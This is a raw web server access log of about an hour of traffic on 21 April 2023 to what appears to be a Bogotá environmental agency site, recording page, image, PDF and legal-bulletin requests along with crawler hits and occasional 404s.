172.22.2.4 - - [21/Apr/2023:05:28:59 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
181.50.63.78 - - [21/Apr/2023:05:29:07 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
201.245.192.253 - - [21/Apr/2023:05:29:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
193.42.59.206 - - [21/Apr/2023:05:29:16 -0500] "GET /cooperacion-internacional-postulate-para-la-coordinacion-ambiental-de-proyecto-con-la-union-europea-avantia.html HTTP/1.1" 200 1020
139.177.246.48 - - [21/Apr/2023:05:29:41 -0500] "GET /galeria/galeria/fotos/Humedal-Tibanica4P.jpg HTTP/1.1" 200 26708
201.245.192.253 - - [21/Apr/2023:05:30:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38756
201.245.192.253 - - [21/Apr/2023:05:30:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43175
66.249.69.63 - - [21/Apr/2023:05:30:20 -0500] "-" 408 -
172.22.2.4 - - [21/Apr/2023:05:30:24 -0500] "HEAD /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:30:24 -0500] "HEAD /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:30:25 -0500] "HEAD /BLA/boletinlegal/normativa.php HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:30:25 -0500] "HEAD /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:30:26 -0500] "HEAD /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:30:35 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
172.22.2.4 - - [21/Apr/2023:05:30:37 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8343
172.22.2.4 - - [21/Apr/2023:05:30:37 -0500] "GET /BLA/boletinlegal/doctrina.php HTTP/1.1" 200 5614
172.22.2.4 - - [21/Apr/2023:05:30:37 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7496
172.22.2.4 - - [21/Apr/2023:05:30:37 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17583
186.84.91.94 - - [21/Apr/2023:05:31:13 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
201.221.178.42 - - [21/Apr/2023:05:31:18 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:05:30:24 -0500] "HEAD /BLA/boletinlegal/index.php HTTP/1.1" 200 -
170.78.42.195 - - [21/Apr/2023:05:32:19 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
66.249.70.168 - - [21/Apr/2023:05:32:30 -0500] "-" 408 -
172.22.2.4 - - [21/Apr/2023:05:32:38 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
216.245.221.92 - - [21/Apr/2023:05:32:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:31:35 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:33:28 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
179.19.81.37 - - [21/Apr/2023:05:33:31 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
172.22.2.4 - - [21/Apr/2023:05:32:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
201.245.192.253 - - [21/Apr/2023:05:34:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
52.167.144.63 - - [21/Apr/2023:05:34:22 -0500] "GET /BLA/resoluciones/AUTOS%202023/0223.pdf HTTP/1.1" 200 462123
35.234.169.74 - - [21/Apr/2023:05:34:43 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
34.91.94.180 - - [21/Apr/2023:05:35:40 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
179.51.124.37 - - [21/Apr/2023:05:35:50 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:05:35:58 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
179.19.43.128 - - [21/Apr/2023:05:36:05 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
190.26.220.178 - - [21/Apr/2023:05:37:24 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
216.245.221.92 - - [21/Apr/2023:05:37:43 -0500] "HEAD / HTTP/1.1" 200 -
34.147.4.96 - - [21/Apr/2023:05:38:13 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [21/Apr/2023:05:37:25 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Apr/2023:05:39:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
181.53.13.227 - - [21/Apr/2023:05:39:47 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:05:38:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56287
201.245.192.253 - - [21/Apr/2023:05:40:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38756
201.245.192.253 - - [21/Apr/2023:05:40:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43175
186.31.170.190 - - [21/Apr/2023:05:40:24 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
52.167.144.63 - - [21/Apr/2023:05:41:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/5769.pdf HTTP/1.1" 304 -
191.156.157.252 - - [21/Apr/2023:05:42:37 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
191.156.157.252 - - [21/Apr/2023:05:42:37 -0500] "GET /favicon.ico HTTP/1.1" 404 1334
216.245.221.92 - - [21/Apr/2023:05:42:43 -0500] "HEAD / HTTP/1.1" 200 -
191.156.157.252 - - [21/Apr/2023:05:42:49 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
179.51.120.34 - - [21/Apr/2023:05:42:58 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
179.51.120.34 - - [21/Apr/2023:05:42:59 -0500] "GET /favicon.ico HTTP/1.1" 404 1334
200.118.80.1 - - [21/Apr/2023:05:43:02 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
52.167.144.125 - - [21/Apr/2023:05:43:21 -0500] "GET / HTTP/1.1" 200 319
179.51.120.34 - - [21/Apr/2023:05:43:26 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
179.51.120.34 - - [21/Apr/2023:05:43:39 -0500] "GET / HTTP/1.1" 200 4720
179.51.120.34 - - [21/Apr/2023:05:43:40 -0500] "GET /js/url.js HTTP/1.1" 404 1294
179.51.120.34 - - [21/Apr/2023:05:43:40 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
179.51.120.34 - - [21/Apr/2023:05:43:40 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
179.51.120.34 - - [21/Apr/2023:05:43:40 -0500] "GET /css/style.css HTTP/1.1" 200 3473
201.245.192.253 - - [21/Apr/2023:05:44:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
66.249.69.63 - - [21/Apr/2023:05:44:32 -0500] "-" 408 -
114.119.139.134 - - [21/Apr/2023:05:44:32 -0500] "-" 408 -
172.22.2.4 - - [21/Apr/2023:05:43:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:05:45:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
172.22.2.4 - - [21/Apr/2023:05:44:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57945
181.59.3.148 - - [21/Apr/2023:05:45:50 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
216.245.221.92 - - [21/Apr/2023:05:47:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.168 - - [21/Apr/2023:05:49:04 -0500] "-" 408 -
201.245.192.253 - - [21/Apr/2023:05:49:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
191.156.146.73 - - [21/Apr/2023:05:49:07 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1034
191.156.148.48 - - [21/Apr/2023:05:49:31 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1034
45.238.181.157 - - [21/Apr/2023:05:50:01 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
191.156.148.48 - - [21/Apr/2023:05:50:03 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1034
172.22.2.4 - - [21/Apr/2023:05:49:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.156.157.252 - - [21/Apr/2023:05:50:49 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1034
191.156.157.252 - - [21/Apr/2023:05:50:52 -0500] "GET / HTTP/1.1" 200 4720
191.156.157.252 - - [21/Apr/2023:05:50:52 -0500] "GET /js/url.js HTTP/1.1" 404 1294
191.156.157.252 - - [21/Apr/2023:05:50:52 -0500] "GET /fonts/icomoon/style.css HTTP/1.1" 200 79820
191.156.144.23 - - [21/Apr/2023:05:50:52 -0500] "GET /css/style.css HTTP/1.1" 200 3473
191.156.145.150 - - [21/Apr/2023:05:50:52 -0500] "GET /css/bootstrap.min.css HTTP/1.1" 200 178212
40.77.167.101 - - [21/Apr/2023:05:50:53 -0500] "-" 408 -
191.156.146.73 - - [21/Apr/2023:05:51:19 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1034
191.156.146.73 - - [21/Apr/2023:05:51:27 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1034
191.156.146.73 - - [21/Apr/2023:05:51:30 -0500] "GET / HTTP/1.1" 200 4720
191.156.146.73 - - [21/Apr/2023:05:51:30 -0500] "GET /js/url.js HTTP/1.1" 404 1294
172.22.2.4 - - [21/Apr/2023:05:49:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
66.249.69.63 - - [21/Apr/2023:05:51:42 -0500] "-" 408 -
216.245.221.92 - - [21/Apr/2023:05:52:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Apr/2023:05:54:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
191.102.120.31 - - [21/Apr/2023:05:55:40 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
186.28.78.78 - - [21/Apr/2023:05:56:12 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
173.252.107.11 - - [21/Apr/2023:05:56:21 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 206 795
173.252.107.11 - - [21/Apr/2023:05:56:23 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 206 795
173.252.107.117 - - [21/Apr/2023:05:56:23 -0500] "GET /images/camino-cerros-orientales-guadalupe.jpg HTTP/1.1" 200 68101
173.252.107.4 - - [21/Apr/2023:05:56:25 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 206 795
172.22.2.4 - - [21/Apr/2023:05:54:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
181.55.138.53 - - [21/Apr/2023:05:56:43 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
191.156.146.78 - - [21/Apr/2023:05:56:47 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1034
181.53.13.197 - - [21/Apr/2023:05:57:04 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:05:55:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52326
216.245.221.92 - - [21/Apr/2023:05:57:43 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Apr/2023:05:59:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
66.249.70.168 - - [21/Apr/2023:05:59:33 -0500] "-" 408 -
66.249.69.63 - - [21/Apr/2023:05:59:43 -0500] "-" 408 -
69.63.184.4 - - [21/Apr/2023:05:59:54 -0500] "GET /images/caminos-de-los-cerros-1_optimized.jpeg HTTP/1.1" 200 49537
186.84.21.14 - - [21/Apr/2023:06:00:23 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
179.1.136.75 - - [21/Apr/2023:06:01:31 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
179.1.136.75 - - [21/Apr/2023:06:01:31 -0500] "GET /favicon.ico HTTP/1.1" 404 1334
179.1.136.75 - - [21/Apr/2023:06:01:49 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
179.1.136.75 - - [21/Apr/2023:06:01:52 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
172.22.2.4 - - [21/Apr/2023:06:00:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [21/Apr/2023:06:02:43 -0500] "HEAD / HTTP/1.1" 200 -
200.118.63.94 - - [21/Apr/2023:06:02:47 -0500] "GET /mujeres-que-reverde HTTP/1.1" 404 1136
200.118.63.94 - - [21/Apr/2023:06:02:48 -0500] "GET /favicon.ico HTTP/1.1" 404 1332
172.22.2.4 - - [21/Apr/2023:06:01:35 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
157.55.39.220 - - [21/Apr/2023:06:03:37 -0500] "GET /BLA/resoluciones/AUTOS%202021/2033.pdf HTTP/1.1" 304 -
157.55.39.207 - - [21/Apr/2023:06:03:41 -0500] "GET /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
157.55.39.207 - - [21/Apr/2023:06:03:42 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12171
201.245.192.253 - - [21/Apr/2023:06:04:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
173.252.83.12 - - [21/Apr/2023:06:04:37 -0500] "GET /galeria/nivo-slider/demo/images/Bannercentrodefauna.jpg HTTP/1.1" 200 54935
179.51.118.140 - - [21/Apr/2023:06:05:28 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
173.252.95.119 - - [21/Apr/2023:06:06:05 -0500] "GET /images/24%20de%20febrero%20Sendero%20guadalupe%202.jpeg HTTP/1.1" 200 70964
186.29.47.166 - - [21/Apr/2023:06:06:42 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:06:06:45 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 304 -
191.156.180.160 - - [21/Apr/2023:06:06:51 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
66.249.69.63 - - [21/Apr/2023:06:06:52 -0500] "-" 408 -
186.84.21.14 - - [21/Apr/2023:06:07:31 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
179.19.64.35 - - [21/Apr/2023:06:07:34 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
216.245.221.92 - - [21/Apr/2023:06:07:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:06:06:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Apr/2023:06:08:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
172.22.2.4 - - [21/Apr/2023:06:07:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
186.99.147.28 - - [21/Apr/2023:06:10:27 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
181.130.48.4 - - [21/Apr/2023:06:12:05 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
190.159.40.107 - - [21/Apr/2023:06:12:24 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
216.245.221.92 - - [21/Apr/2023:06:12:43 -0500] "HEAD / HTTP/1.1" 200 -
179.51.112.132 - - [21/Apr/2023:06:13:07 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
181.54.39.20 - - [21/Apr/2023:06:13:17 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
201.245.192.253 - - [21/Apr/2023:06:13:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
172.22.2.4 - - [21/Apr/2023:06:12:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.156.183.149 - - [21/Apr/2023:06:14:38 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
191.156.179.149 - - [21/Apr/2023:06:14:48 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:06:13:15 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
54.39.177.48 - - [21/Apr/2023:06:15:39 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
191.156.59.44 - - [21/Apr/2023:06:15:53 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
35.204.220.184 - - [21/Apr/2023:06:16:15 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
45.238.182.19 - - [21/Apr/2023:06:16:21 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
66.249.69.63 - - [21/Apr/2023:06:16:42 -0500] "-" 408 -
52.167.144.27 - - [21/Apr/2023:06:17:34 -0500] "GET /BLA/boletinlegal/notificaciones.php HTTP/1.1" 200 10015
172.22.2.4 - - [21/Apr/2023:06:17:39 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
216.245.221.92 - - [21/Apr/2023:06:17:43 -0500] "HEAD / HTTP/1.1" 200 -
191.156.177.173 - - [21/Apr/2023:06:17:55 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
186.29.44.161 - - [21/Apr/2023:06:18:02 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
201.245.192.253 - - [21/Apr/2023:06:18:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
191.156.157.252 - - [21/Apr/2023:06:19:04 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
186.168.252.102 - - [21/Apr/2023:06:19:22 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:06:18:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [21/Apr/2023:06:20:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38903
201.245.192.253 - - [21/Apr/2023:06:20:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43176
172.22.2.4 - - [21/Apr/2023:06:20:36 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
172.22.2.4 - - [21/Apr/2023:06:19:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57561
172.22.2.4 - - [21/Apr/2023:06:20:48 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
193.32.162.159 - - [21/Apr/2023:06:20:58 -0500] "GET / HTTP/1.1" 200 319
193.32.162.159 - - [21/Apr/2023:06:21:08 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
172.22.2.4 - - [21/Apr/2023:06:21:10 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
190.27.156.3 - - [21/Apr/2023:06:21:13 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
66.249.70.170 - - [21/Apr/2023:06:22:42 -0500] "-" 408 -
216.245.221.92 - - [21/Apr/2023:06:22:43 -0500] "HEAD / HTTP/1.1" 200 -
66.249.69.63 - - [21/Apr/2023:06:23:07 -0500] "-" 408 -
52.167.144.27 - - [21/Apr/2023:06:23:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/4489.pdf HTTP/1.1" 304 -
34.91.254.233 - - [21/Apr/2023:06:23:19 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [21/Apr/2023:06:23:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
181.61.205.86 - - [21/Apr/2023:06:24:34 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
201.221.172.142 - - [21/Apr/2023:06:24:43 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
186.154.36.194 - - [21/Apr/2023:06:25:14 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
179.51.118.140 - - [21/Apr/2023:06:25:31 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:06:24:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.90.244.54 - - [21/Apr/2023:06:26:28 -0500] "GET / HTTP/1.1" 200 319
157.90.244.54 - - [21/Apr/2023:06:26:30 -0500] "GET / HTTP/1.1" 200 4720
186.154.115.54 - - [21/Apr/2023:06:26:32 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
172.22.2.4 - - [21/Apr/2023:06:24:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
142.44.136.207 - - [21/Apr/2023:06:26:50 -0500] "GET /auambari-deleito-con-sus-sonidos-ambientales-a-los-asistentes-de-fima-2021.html HTTP/1.1" 200 888
45.238.183.218 - - [21/Apr/2023:06:27:00 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
216.245.221.92 - - [21/Apr/2023:06:27:43 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [21/Apr/2023:06:27:48 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
191.156.183.125 - - [21/Apr/2023:06:28:02 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
191.95.50.51 - - [21/Apr/2023:06:28:05 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
191.95.48.194 - - [21/Apr/2023:06:28:55 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
201.245.192.253 - - [21/Apr/2023:06:28:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41946
186.155.17.66 - - [21/Apr/2023:06:29:47 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
201.245.192.253 - - [21/Apr/2023:06:30:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38903
201.245.192.253 - - [21/Apr/2023:06:30:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43176
191.156.59.8 - - [21/Apr/2023:06:30:38 -0500] "GET /guadalupe-aguanoso-un-nuevo-tramo-de-camino-para-disfrutar-en-los-cerros-orientales.html HTTP/1.1" 200 795
181.59.3.92 - - [21/Apr/2023:06:30:48 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
179.19.51.113 - - [21/Apr/2023:06:31:12 -0500] "GET /mujeres-que-reverdec HTTP/1.1" 404 1136
179.19.51.113 - - [21/Apr/2023:06:31:12 -0500] "GET /favicon.ico HTTP/1.1" 404 1334
191.156.157.252 - - [21/Apr/2023:06:31:22 -0500] "GET /mujeres-que-reverdecen-secretaria-de-ambiente-anuncia-300-cupos-para-la-tercera-fase-del-programa.html HTTP/1.1" 200 823
172.22.2.4 - - [21/Apr/2023:06:29:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.12.232.46 - - [21/Apr/2023:06:31:35 -0500] "GET / HTTP/1.0" 200 319
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [21/Apr/2023:06:31:50 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
